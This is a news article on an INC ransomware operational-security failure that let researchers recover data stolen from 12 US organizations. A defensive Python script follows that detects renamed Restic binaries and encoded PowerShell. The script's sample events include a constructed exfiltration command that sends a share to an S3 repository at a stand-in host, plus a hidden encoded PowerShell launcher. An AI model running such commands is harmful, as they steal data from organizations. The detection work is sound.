INC ransomware opsec fail allowed data recovery for 12 US orgs

An operational security failure allowed researchers to recover data that the INC ransomware gang stole from a dozen US organizations.

A deep forensic examination of the artifacts left behind uncovered tooling that had not been used in the investigated attack, but that exposed attacker infrastructure storing data exfiltrated from multiple victims.

The operation was conducted by Cyber Centaurs, a digital forensics and incident response company that disclosed its success last November and has now shared the full details with BleepingComputer.

The Cyber Centaurs investigation began after a client, a US organization, detected ransomware encryption activity on a production SQL Server.

The payload, a RainINC ransomware variant, was executed from the PerfLogs directory. Windows creates C:\PerfLogs by default (for Performance Monitor logs) and it normally sits empty, which is why ransomware actors have increasingly used it as a staging location.

The researchers also noticed artifacts from the legitimate backup tool Restic. However, data exfiltration had occurred during the lateral movement stage, and the threat actor had not used the utility in this attack.

This shifted the researchers' investigation from incident response to infrastructure analysis.

The traces INC ransomware left behind included renamed binaries (such as winupdate.exe), PowerShell scripts to execute Restic, hard-coded repository configuration variables, and backup commands.

The Restic-related remnants indicated that the threat actor was using the backup tool selectively as part of its operational toolkit.

One of the discovered PowerShell scripts, new.ps1, contained Base64-encoded Restic commands and included hard-coded environment variables used to run the tool: S3 access keys, repository paths, and the passwords for the encrypted repositories.

If INC routinely reused Restic-based infrastructure across campaigns, then the storage repositories referenced in attacker scripts were unlikely to be dismantled once a ransom event concluded, the researchers theorized.

Instead, those repositories would likely persist as long-lived, attacker-controlled assets, quietly retaining encrypted victim data well after negotiations ended or payments were made.

If this were the case, data stolen from other organizations could still be available in encrypted form and could potentially be recovered from the backup server.

To validate this hypothesis, the team developed a controlled, non-destructive enumeration process that confirmed the presence of encrypted data stolen from 12 unrelated organizations in the healthcare, manufacturing, technology, and service sectors in the United States.

None of the organizations were Cyber Centaurs clients, and the incidents were unrelated, distinct ransomware events.

The researchers then decrypted the backups and preserved the copies while contacting law enforcement to help validate ownership and guide them through the proper procedure.

The Cyber Centaurs report lists multiple tools used in INC ransomware attacks, including, among others, cleanup tools, remote access software, and network scanners.

The researchers also created YARA and Sigma rules to help defenders detect the Restic backup tool, or its renamed binaries, in the environment or running from suspicious locations, which could signal a ransomware attack in development.

INC ransomware is a ransomware-as-a-service (RaaS) operation that emerged in mid-2023.

The threat actor has claimed several high-profile victims over the years, including Yamaha Motor, Xerox Business Solutions, Scotland's NHS, McLaren Health Care, the Texas State Bar, Ahold Delhaize, the Panama Ministry of Economy, the Pennsylvania AG Office, and Crisis24.
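The Restic artifacts described in the report (a renamed binary such as winupdate.exe launched from PerfLogs, and a PowerShell script carrying Base64-encoded Restic commands with hard-coded credentials) are exactly the signals a process-creation detection can key on. The script below is an added example written for this page, not code from Cyber Centaurs, from the report, or from its YARA/Sigma rules. It runs that detection logic over a few constructed Sysmon-style process-creation events; the field names (Image, OriginalFileName, CommandLine) follow Sysmon Event ID 1, while the staging directories other than PerfLogs, and every hostname, path and credential in the samples, are assumptions made up for the example.

```python
import base64
import re

# Directories abused for staging. PerfLogs is from the report; the other two
# are my assumption (commonly abused, but not named on the page).
STAGING_DIRS = ("c:\\perflogs\\", "c:\\users\\public\\", "c:\\windows\\temp\\")

# Substrings that betray Restic in a command line or a decoded script.
# RESTIC_PASSWORD is the repository password; the AWS_* variables are the
# credentials Restic reads for an S3 backend; "-r s3:" selects that backend.
RESTIC_MARKERS = ("restic", "restic_password", "restic_repository",
                  "aws_access_key_id", "aws_secret_access_key", "-r s3:")

# -e, -ec, -enc, -EncodedCommand ... followed by a Base64 blob.
ENCODED_RE = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the text behind a PowerShell -EncodedCommand argument, or ''.
    PowerShell expects Base64 of the script as UTF-16LE, so decode it that way."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error (bad padding etc.) is a ValueError
        return ""


def analyze_event(ev):
    """Return the reasons one Sysmon-style process-creation event is suspicious."""
    reasons = []
    image = ev.get("Image", "").lower()
    original = ev.get("OriginalFileName", "").lower()
    cmdline = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    text = (cmdline + "\n" + decoded).lower()

    # A renamed binary keeps its PE version info: OriginalFileName still says
    # restic.exe even though the file on disk is called something else.
    if original == "restic.exe" and not image.endswith("\\restic.exe"):
        reasons.append("restic.exe renamed to " + image.split("\\")[-1])
    if image.startswith(STAGING_DIRS):
        reasons.append("executed from staging directory")
    hits = [marker for marker in RESTIC_MARKERS if marker in text]
    if hits:
        reasons.append("restic markers: " + ", ".join(hits))
    if decoded:
        reasons.append("encoded PowerShell command decoded")
    return reasons


def detect_restic_events(events):
    """Run analyze_event over a batch; return [(RecordId, reasons)] for hits."""
    flagged = []
    for ev in events:
        reasons = analyze_event(ev)
        if reasons:
            flagged.append((ev["RecordId"], reasons))
    return flagged


def powershell_encode(script):
    """Build an -EncodedCommand value the way an attacker's launcher would."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events, not real telemetry. Hosts, paths and secrets are made up.
ATTACKER_SCRIPT = ("$env:RESTIC_PASSWORD='Winter2024!'; "
                   "$env:AWS_ACCESS_KEY_ID='EXAMPLEKEY'; "
                   "& 'C:\\PerfLogs\\winupdate.exe' -r s3:http://203.0.113.10:9000/vault backup D:\\Shares")

SAMPLE_EVENTS = [
    {"RecordId": "evt-1", "Image": "C:\\PerfLogs\\winupdate.exe",
     "OriginalFileName": "restic.exe",
     "CommandLine": "\"C:\\PerfLogs\\winupdate.exe\" -r s3:http://203.0.113.10:9000/vault backup D:\\Shares"},
    {"RecordId": "evt-2",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -EncodedCommand " + powershell_encode(ATTACKER_SCRIPT)},
    {"RecordId": "evt-3", "Image": "C:\\Windows\\System32\\svchost.exe",
     "OriginalFileName": "svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
    # Legitimate, unrenamed Restic backup from its normal install path.
    {"RecordId": "evt-4", "Image": "C:\\Program Files\\restic\\restic.exe",
     "OriginalFileName": "restic.exe",
     "CommandLine": "restic.exe -r s3:https://s3.example.com/corp-backups backup C:\\Data"},
]

if __name__ == "__main__":
    for record_id, reasons in detect_restic_events(SAMPLE_EVENTS):
        print(record_id, "->", "; ".join(reasons))
```

On real telemetry the marker check alone also fires on a sysadmin's legitimate Restic job (evt-4 above), so treat it as context; the rename condition (OriginalFileName disagreeing with the on-disk name) and execution from a staging directory like PerfLogs are what separate the INC tradecraft from normal backups, and a Sigma rule built from this logic should weight them accordingly.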